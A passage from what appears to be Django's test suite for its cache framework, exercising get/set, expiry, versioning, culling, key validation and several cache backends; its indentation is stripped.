# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
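        # ``cull_cache`` is assumed to be configured (in the test settings) with a
        # MAX_ENTRIES value low enough that inserting ``initial_count`` keys
        # triggers a cull; ``final_count`` is how many keys should survive it.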
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
        # Mimic a custom ``make_key`` method being defined, since the default
        # key function will never trigger the warnings below.
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
        # The super call needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertIsNone(cache.get("key1"))
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
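        # Invoked when the cache backend pickles this object; recording whether
        # the backend's lock is held at that moment lets test_locking_on_pickle
        # verify that pickling happens outside the lock.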
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
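        # make_key applies the configured prefix and version, yielding the
        # internal key that LocMemCache uses in its _expire_info mapping.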
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
        On memcached, we don't add our own key-validation step (for speed
        reasons); we just let the memcached API library raise its own
        exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
        # pylibmc doesn't appear to expose SERVER_MAX_VALUE_LENGTH, so fall
        # back to the default value exposed by python-memcached (1 MB).
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
cache.set('small_value', large_value)
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
        self.assertTrue(os.path.exists(self.dirname))
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(TestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
